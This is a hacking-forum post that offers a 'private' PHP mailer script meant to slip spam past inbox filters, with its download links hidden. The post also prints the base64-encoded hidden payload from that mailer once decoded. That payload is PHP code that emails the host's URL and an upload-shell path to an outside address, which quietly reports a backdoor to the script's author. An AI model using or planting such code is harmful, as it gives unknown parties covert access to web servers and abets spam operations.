• Earn real money by being active: Hello Guest, earn real money by simply being active on the forum — post quality content, get reactions, and help the community. Once you reach the minimum credit amount, you’ll be able to withdraw your balance directly. Learn how it works.

Priv8 PHP Mailer inbox

Status
Not open for further replies.

drhack777

New member
User
Joined
Jun 1, 2018
Messages
1
Reputation
0
Reaction score
16
Points
3
Credits
0
‎7 Years of Service‎
20%
Hi All

Today I give all member here script php for sending with php mailer inbox 

1= enter unidected info

2= enter unidected letter

3= enter unidected email from

Link Dwonload

This link is hidden for visitors. Please Log in or register now.


This link is hidden for visitors. Please Log in or register now.


 
this mailer have hidden content

last string base64 decoded like this --->

$to = "[email protected]";
$subject = "New Shell";
$header = "From: xShell<[email protected]>";
$message = "Exploit : http://". $_SERVER['SERVER_NAME']. $_SERVER['REQUEST_URI'] . "?upload=up \r\n";
$sentmail = @mail($to, $subject, $message, $header);
echo "";
exit;

 
Status
Not open for further replies.
Back
Top